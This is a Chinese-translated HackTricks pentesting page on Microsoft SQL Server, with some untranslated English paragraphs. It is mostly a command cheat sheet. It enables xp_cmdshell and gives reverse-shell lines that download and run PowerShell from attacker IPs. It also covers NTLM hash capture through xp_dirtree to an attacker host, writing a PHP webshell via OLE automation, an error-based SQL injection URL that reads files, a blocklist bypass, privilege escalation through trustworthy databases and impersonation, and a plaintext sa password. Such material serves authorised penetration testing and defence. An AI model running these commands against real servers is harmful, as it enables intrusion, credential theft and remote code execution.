| .. | ||
| README.md | ||
| types-of-mssql-users.md | ||
1433 - Pentesting MSSQL - Microsoft SQL Server
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一个网络安全公司工作吗?你想在HackTricks中看到你的公司广告吗?或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品The PEASS Family
- 获得官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。
找到最重要的漏洞,以便您可以更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
基本信息
Microsoft SQL Server是由Microsoft开发的关系型数据库管理系统。作为数据库服务器,它是一个软件产品,其主要功能是根据其他软件应用程序的请求存储和检索数据,这些应用程序可以在同一台计算机上运行,也可以在网络(包括互联网)上的另一台计算机上运行。
来自wikipedia。
默认端口: 1433
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
默认的MS-SQL系统表
- master数据库:记录SQL Server实例的所有系统级信息。
- msdb数据库:被SQL Server Agent用于调度警报和作业。
- model数据库:用作在SQL Server实例上创建的所有数据库的模板。对model数据库进行的修改,如数据库大小、排序规则、恢复模型和其他数据库选项,将应用于之后创建的任何数据库。
- Resource数据库:是一个只读数据库,包含SQL Server附带的系统对象。系统对象在Resource数据库中物理上持久存在,但在每个数据库的sys模式中逻辑上出现。
- tempdb数据库:是一个用于保存临时对象或中间结果集的工作空间。
枚举
自动枚举
如果对服务一无所知:
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping
{% hint style="info" %} 如果您没有凭据,可以尝试猜测它们。您可以使用nmap或metasploit。请注意,如果您使用现有用户名多次登录失败,可能会锁定帐户。 {% endhint %}
Metasploit(需要凭据)
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
#Search for insteresting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
暴力破解
手动枚举
登录
# Using Impacket mssqlclient.py
mssqlclient.py [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
## Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine
mssqlclient.py [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go
常见枚举
Service Detection
服务检测
To begin with, we need to identify if the target system is running Microsoft SQL Server. We can use various methods to achieve this.
首先,我们需要确定目标系统是否正在运行Microsoft SQL Server。我们可以使用各种方法来实现这一点。
One common method is to use a port scanning tool like Nmap to scan for open ports on the target system. By default, Microsoft SQL Server listens on TCP port 1433. If this port is open, it indicates that the system may be running Microsoft SQL Server.
一个常见的方法是使用端口扫描工具(如Nmap)扫描目标系统上的开放端口。默认情况下,Microsoft SQL Server监听TCP端口1433。如果该端口开放,表示系统可能正在运行Microsoft SQL Server。
Another method is to use banner grabbing to obtain information about the running services on the target system. This can be done using tools like Telnet or Netcat. By connecting to the target system on port 1433 and examining the banner response, we can determine if Microsoft SQL Server is running.
另一种方法是使用横幅抓取来获取有关目标系统上正在运行的服务的信息。可以使用Telnet或Netcat等工具来完成。通过连接到目标系统的1433端口并检查横幅响应,我们可以确定是否正在运行Microsoft SQL Server。
Version Detection
版本检测
Once we have identified that the target system is running Microsoft SQL Server, the next step is to determine the version of the server. This information can be useful in identifying potential vulnerabilities and selecting appropriate exploitation techniques.
一旦确定目标系统正在运行Microsoft SQL Server,下一步是确定服务器的版本。这些信息可以帮助我们识别潜在的漏洞并选择适当的利用技术。
One way to determine the version is by querying the server using SQL statements. For example, we can execute the following query to retrieve the version information:
确定版本的一种方法是使用SQL语句查询服务器。例如,我们可以执行以下查询以检索版本信息:
SELECT @@VERSION;
This query will return the version information of the Microsoft SQL Server.
此查询将返回Microsoft SQL Server的版本信息。
Another method is to use tools like Nmap or Metasploit to perform version detection. These tools have built-in scripts and modules that can identify the version of Microsoft SQL Server running on the target system.
另一种方法是使用Nmap或Metasploit等工具进行版本检测。这些工具具有内置的脚本和模块,可以识别目标系统上运行的Microsoft SQL Server的版本。
Enumeration of Databases
数据库枚举
Once we have identified the version of Microsoft SQL Server, we can proceed with enumerating the databases hosted on the server. This step is important as it allows us to gather information about the structure and content of the databases, which can be useful in further exploitation.
一旦确定了Microsoft SQL Server的版本,我们可以继续枚举托管在服务器上的数据库。这一步骤很重要,因为它允许我们收集有关数据库的结构和内容的信息,这对进一步的利用非常有用。
There are several methods to enumerate databases in Microsoft SQL Server. One common method is to use SQL statements to query the server for a list of databases. For example, we can execute the following query to retrieve the names of all databases:
有几种方法可以枚举Microsoft SQL Server中的数据库。一种常见的方法是使用SQL语句查询服务器以获取数据库列表。例如,我们可以执行以下查询以检索所有数据库的名称:
SELECT name FROM sys.databases;
This query will return the names of all databases hosted on the server.
此查询将返回托管在服务器上的所有数据库的名称。
Another method is to use tools like Nmap or Metasploit, which have built-in scripts and modules for enumerating databases in Microsoft SQL Server.
另一种方法是使用Nmap或Metasploit等工具,这些工具具有用于枚举Microsoft SQL Server中数据库的内置脚本和模块。
Enumeration of Tables and Columns
表和列的枚举
Once we have identified the databases hosted on the server, the next step is to enumerate the tables and columns within each database. This step is crucial as it allows us to identify sensitive data and potential targets for further exploitation.
一旦确定了托管在服务器上的数据库,下一步是枚举每个数据库中的表和列。这一步骤非常重要,因为它允许我们识别敏感数据和进一步利用的潜在目标。
To enumerate tables and columns, we can use SQL statements to query the server. For example, we can execute the following query to retrieve the names of all tables within a specific database:
为了枚举表和列,我们可以使用SQL语句查询服务器。例如,我们可以执行以下查询以检索特定数据库中所有表的名称:
SELECT name FROM sys.tables;
This query will return the names of all tables within the specified database.
此查询将返回指定数据库中所有表的名称。
Similarly, we can execute SQL statements to retrieve the names of columns within a specific table. For example, we can execute the following query to retrieve the names of all columns within a table:
类似地,我们可以执行SQL语句来检索特定表中列的名称。例如,我们可以执行以下查询以检索表中所有列的名称:
SELECT name FROM sys.columns WHERE object_id = OBJECT_ID('table_name');
This query will return the names of all columns within the specified table.
此查询将返回指定表中所有列的名称。
There are also tools like Nmap or Metasploit that have built-in scripts and modules for enumerating tables and columns in Microsoft SQL Server.
还有一些工具,如Nmap或Metasploit,它们具有用于枚举Microsoft SQL Server中表和列的内置脚本和模块。
Enumeration of Users and Privileges
用户和权限的枚举
Another important aspect of enumeration is to identify the users and their privileges within the Microsoft SQL Server. This information can help us in understanding the access levels and potential targets for privilege escalation.
枚举的另一个重要方面是确定Microsoft SQL Server中的用户及其权限。这些信息可以帮助我们了解访问级别和潜在的特权升级目标。
To enumerate users and their privileges, we can use SQL statements to query the server. For example, we can execute the following query to retrieve the names of all users within the server:
为了枚举用户及其权限,我们可以使用SQL语句查询服务器。例如,我们可以执行以下查询以检索服务器中所有用户的名称:
SELECT name FROM sys.syslogins;
This query will return the names of all users within the server.
此查询将返回服务器中所有用户的名称。
Similarly, we can execute SQL statements to retrieve the privileges assigned to a specific user. For example, we can execute the following query to retrieve the privileges assigned to a user:
类似地,我们可以执行SQL语句来检索分配给特定用户的权限。例如,我们可以执行以下查询以检索分配给用户的权限:
EXEC sp_helpuser 'username';
This query will return the privileges assigned to the specified user.
此查询将返回分配给指定用户的权限。
There are also tools like Nmap or Metasploit that have built-in scripts and modules for enumerating users and their privileges in Microsoft SQL Server.
还有一些工具,如Nmap或Metasploit,它们具有用于枚举Microsoft SQL Server中用户及其权限的内置脚本和模块。
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
获取用户
{% content-ref url="types-of-mssql-users.md" %} types-of-mssql-users.md {% endcontent-ref %}
# Get all the users and roles
select * from sys.database_principals;
## This query filters a bit the results
select name,
create_date,
modify_date,
type_desc as type,
authentication_type_desc as authentication_type,
sid
from sys.database_principals
where type not in ('A', 'R')
order by name;
## Both of these select all the users of the current database (not the server).
## Interesting when you cannot acces the table sys.database_principals
EXEC sp_helpuser
SELECT * FROM sysusers
获取权限
关于MSSQL术语的一些介绍:
- 可保护资源(Securable): 这些是SQL Server数据库引擎授权系统控制访问的资源。可保护资源可以分为三个更广泛的类别:
- 服务器 - 例如数据库、登录、端点、可用性组和服务器角色
- 数据库 - 例如数据库角色、应用程序角色、模式、证书、全文目录、用户
- 模式 - 例如表、视图、存储过程、函数、同义词
- 权限(Permission): 每个SQL Server可保护资源都有关联的权限,如ALTER、CONTROL、CREATE,可以授予给主体。权限在服务器级别使用登录名进行管理,在数据库级别使用用户进行管理。
- 主体(Principal): 接收对可保护资源的权限的实体称为主体。最常见的主体是登录名和数据库用户。通过授予或拒绝权限,或将登录名和用户添加到具有访问权限的角色中,来控制对可保护资源的访问。
# Show all different securables names
SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
# Get all my permissions over a database
USE <database>
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
# Get members of the role "sysadmin"
Use master
EXEC sp_helpsrvrolemember 'sysadmin';
# Get if the current user is sysadmin
SELECT IS_SRVROLEMEMBER('sysadmin');
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
技巧
执行操作系统命令
{% hint style="danger" %}
请注意,要能够执行命令,不仅需要启用 xp_cmdshell,还需要对 xp_cmdshell 存储过程具有 EXECUTE 权限。您可以使用以下命令查看(除 sysadmins 外)可以使用 xp_cmdshell 的用户:
Use master
EXEC sp_helprotect 'xp_cmdshell'
{% endhint %}
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
#One liner
sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
窃取NetNTLM哈希值 / 中继攻击
您应该启动一个SMB服务器来捕获在身份验证中使用的哈希值(例如impacket-smbserver或responder)。
xp_dirtree '\\<attacker_IP>\any\thing'
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
EXEC master..xp_fileexist '\\<attacker_IP>\anything\'
# Capture hash
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
{% hint style="warning" %} 您可以使用以下命令检查除系统管理员之外的用户是否具有运行这些MSSQL函数的权限:
Use master;
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_subdirs';
EXEC sp_helprotect 'xp_fileexist';
{% endhint %}
使用诸如responder或Inveigh之类的工具,可以窃取NetNTLM哈希。
您可以在以下位置了解如何使用这些工具:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %} spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {% endcontent-ref %}
滥用MSSQL的可信链接
阅读此文章 以获取有关如何滥用此功能的更多信息:
{% content-ref url="../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md" %} abusing-ad-mssql.md {% endcontent-ref %}
写入文件
要使用MSSQL写入文件,我们需要启用Ole Automation Procedures,这需要管理员权限,然后执行一些存储过程来创建文件:
# Enable Ole Automation Procedures
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
# Create a File
DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
使用 OPENROWSET 读取文件
默认情况下,MSSQL 允许在操作系统中具有读取权限的任何文件上进行读取。我们可以使用以下 SQL 查询语句:
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
然而,BULK 选项需要 ADMINISTER BULK OPERATIONS 或 ADMINISTER DATABASE BULK OPERATIONS 权限。
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
基于错误的SQLi攻击向量:
This technique involves exploiting SQL injection vulnerabilities by manipulating the application to generate error messages that reveal sensitive information about the database structure or data. By injecting malicious SQL statements, an attacker can force the application to produce error messages that provide valuable insights into the underlying database.
这种技术涉及利用SQL注入漏洞,通过操纵应用程序生成错误消息来揭示有关数据库结构或数据的敏感信息。通过注入恶意的SQL语句,攻击者可以迫使应用程序产生错误消息,从而提供有关底层数据库的有价值的见解。
The error-based vector for SQL injection can be used to extract information such as table names, column names, and even data from the database. By carefully crafting SQL statements that intentionally cause errors, an attacker can gather valuable information that can be used for further exploitation.
SQL注入的基于错误的向量可以用于提取诸如表名、列名甚至数据库中的数据等信息。通过精心构造故意引发错误的SQL语句,攻击者可以收集有价值的信息,以便进一步利用。
It is important to note that error-based SQL injection attacks can be time-consuming and may require trial and error to identify the correct syntax and exploit the vulnerability successfully. However, they can be highly effective in extracting sensitive information from a vulnerable application.
需要注意的是,基于错误的SQL注入攻击可能耗时,并且可能需要反复尝试以识别正确的语法并成功利用漏洞。然而,它们在从易受攻击的应用程序中提取敏感信息方面非常有效。
To protect against error-based SQL injection attacks, it is crucial to implement proper input validation and parameterized queries in the application code. Regular security assessments and penetration testing can also help identify and mitigate SQL injection vulnerabilities before they can be exploited by attackers.
为了防止基于错误的SQL注入攻击,关键是在应用程序代码中实施适当的输入验证和参数化查询。定期进行安全评估和渗透测试也可以帮助在攻击者利用之前识别和减轻SQL注入漏洞。
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
RCE/读取文件执行脚本(Python和R)
MSSQL可以让您执行Python和/或R脚本。这些代码将由一个不同的用户执行,而不是使用xp_cmdshell执行命令的用户。
尝试执行一个**'R'** "Hellow World!" 不起作用的示例:
使用配置的Python执行多个操作的示例:
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
#Open and read a file
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
#Multiline
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
import sys
print(sys.version)
'
GO
读取注册表
Microsoft SQL Server提供了多个扩展存储过程,允许您与网络、文件系统甚至Windows注册表进行交互:
| 常规 | 实例感知 |
|---|---|
| sys.xp_regread | sys.xp_instance_regread |
| sys.xp_regenumvalues | sys.xp_instance_regenumvalues |
| sys.xp_regenumkeys | sys.xp_instance_regenumkeys |
| sys.xp_regwrite | sys.xp_instance_regwrite |
| sys.xp_regdeletevalue | sys.xp_instance_regdeletevalue |
| sys.xp_regdeletekey | sys.xp_instance_regdeletekey |
| sys.xp_regaddmultistring | sys.xp_instance_regaddmultistring |
| sys.xp_regremovemultistring | sys.xp_instance_regremovemultistring |
# Example read registry
EXECUTE master.sys.xp_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Microsoft SQL Server\MSSQL12.SQL2014\SQLServerAgent', 'WorkingDirectory';
# Example write and then read registry
EXECUTE master.sys.xp_instance_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue', 'REG_SZ', 'Now you see me!';
EXECUTE master.sys.xp_instance_regread 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\MSSQLSERVER\SQLServerAgent\MyNewKey', 'MyNewValue';
# Example to check who can use these functions
Use master;
EXEC sp_helprotect 'xp_regread';
EXEC sp_helprotect 'xp_regwrite';
要查看更多示例,请访问原始来源。
使用MSSQL用户定义函数进行远程命令执行(RCE)- SQLHttp
可以使用自定义函数在MSSQL中加载.NET dll。然而,这需要dbo访问权限,因此您需要使用sa或管理员角色的数据库连接。
单击此链接查看示例。
其他RCE方法
还有其他方法可以实现命令执行,例如添加扩展存储过程、CLR程序集、SQL Server代理作业和外部脚本。
查找最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
MSSQL权限提升
从db_owner到sysadmin
如果将普通用户赋予**db_owner角色,该角色拥有由管理员用户(例如sa)拥有的数据库,并且该数据库配置为trustworthy**,那么该用户可以滥用这些权限进行权限提升,因为在其中创建的存储过程可以作为所有者(管理员)执行。
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;
# Get roles over the selected database (look for your username as db_owner)
USE <trustworthy_db>
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE <trustworthy_db>
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'USERNAME','sysadmin'
--2. Execute stored procedure to get sysadmin role
USE <trustworthy_db>
EXEC sp_elevate_me
--3. Verify your user is a sysadmin
SELECT is_srvrolemember('sysadmin')
您可以使用metasploit模块:
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
或者一个 PS 脚本:
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1
Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1
Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlServerInstance 10.2.2.184
冒充其他用户
SQL Server有一个特殊的权限,名为**IMPERSONATE**,它允许执行用户扮演另一个用户或登录,直到上下文被重置或会话结束。
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
# Check if the user "sa" or any other high privileged user is mentioned
# Impersonate sa user
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
{% hint style="info" %} 如果你能冒充一个用户,即使他不是sysadmin,你应该检查该用户是否有访问其他数据库或链接服务器的权限。 {% endhint %}
请注意,一旦你成为sysadmin,你可以冒充任何其他用户:
-- Impersonate RegUser
EXECUTE AS LOGIN = 'RegUser'
-- Verify you are now running as the the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT
您可以使用metasploit模块执行此攻击:
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
或者使用 PS 脚本:
# https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1
Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!
使用MSSQL进行持久化
https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
从SQL Server Linked Servers中提取密码
攻击者可以从SQL实例中提取SQL Server Linked Servers的密码,并以明文形式获取这些密码,从而为攻击者获取用于在目标上获得更大立足点的密码。 可以在此处找到提取和解密存储的Linked Servers密码的脚本。
为使此漏洞利用工作,需要进行一些要求和配置。 首先,您必须具有机器上的管理员权限,或者具备管理SQL Server配置的能力。
在验证权限后,您需要配置以下三个内容:
- 在SQL Server实例上启用TCP/IP;
- 添加一个启动参数,这里将添加一个跟踪标志,即-T7806;
- 启用远程管理员连接。
为了自动化这些配置,此存储库提供了所需的脚本。 除了为每个配置步骤提供一个PowerShell脚本外,该存储库还提供了一个完整的脚本,将配置脚本与密码的提取和解密结合在一起。
有关此攻击的更多信息,请参考以下链接: 解密MSSQL数据库链接服务器密码
本地权限提升
运行MSSQL服务器的用户将启用特权令牌SeImpersonatePrivilege。
您可能能够通过以下两种方式之一升级为管理员:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %} roguepotato-and-printspoofer.md {% endcontent-ref %}
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/juicypotato.md" %} juicypotato.md {% endcontent-ref %}
Shodan
port:1433 !HTTP
参考资料
- https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users
- https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/
- https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
- https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
- https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/
- https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/
- https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/
找到最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
HackTricks自动命令
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MSSQL
Note: |
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
#sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
###the goal is to get xp_cmdshell working###
1. try and see if it works
xp_cmdshell `whoami`
go
2. try to turn component back on
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell `whoami`
go
3. 'advanced' turn it back on
EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go
EXEC SP_CONFIGURE 'xp_cmdshell' , 1
reconfigure
go
xp_cmdshell 'whoami'
go
xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Entry_2:
Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
Entry_3:
Name: MSSQL consolesless mfs enumeration
Description: MSSQL enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家 网络安全公司 工作吗?你想在 HackTricks 中看到你的 公司广告吗?或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗?请查看 订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获得 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 电报群组 或 关注 我的 Twitter 🐦@carlospolopm.
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。